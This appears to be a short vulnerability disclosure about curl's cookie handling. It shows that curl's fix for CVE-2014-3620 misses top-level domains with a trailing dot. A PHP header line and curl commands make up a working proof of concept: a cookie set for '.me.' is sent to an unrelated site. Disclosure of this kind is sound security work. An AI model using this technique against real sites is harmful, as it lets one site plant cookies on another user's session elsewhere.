In CVE-2014-3620 curl prevents cookies from being set for Top Level Domains (TLDs). According to the advisory, curl’s “cookie parser has no Public Suffix awareness”, but it will “reject TLDs from being allowed”. However, a cookie can still be set for a TLD + trailing dot.
A trailing dot after a TLD is considered legal and curl will send the http://example.com. to http://example.com
<?php
header("Set-Cookie: a=b; Domain=.me.");
curl -c cookies.txt http://localtest.me./index.php
cookies.txt:
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
.me. TRUE / FALSE 0 a b
curl -b cookies.txt http://domain.me./index.php
GET / HTTP/1.1
Host: domain.me.
User-Agent: curl/7.83.0
Accept: */*
Cookie: a=b
Cookies can be set by arbitrary sites for TLD + “.”, and if a trailing dot is used for an unrelated site, curl will send the cookie to the unrelated site.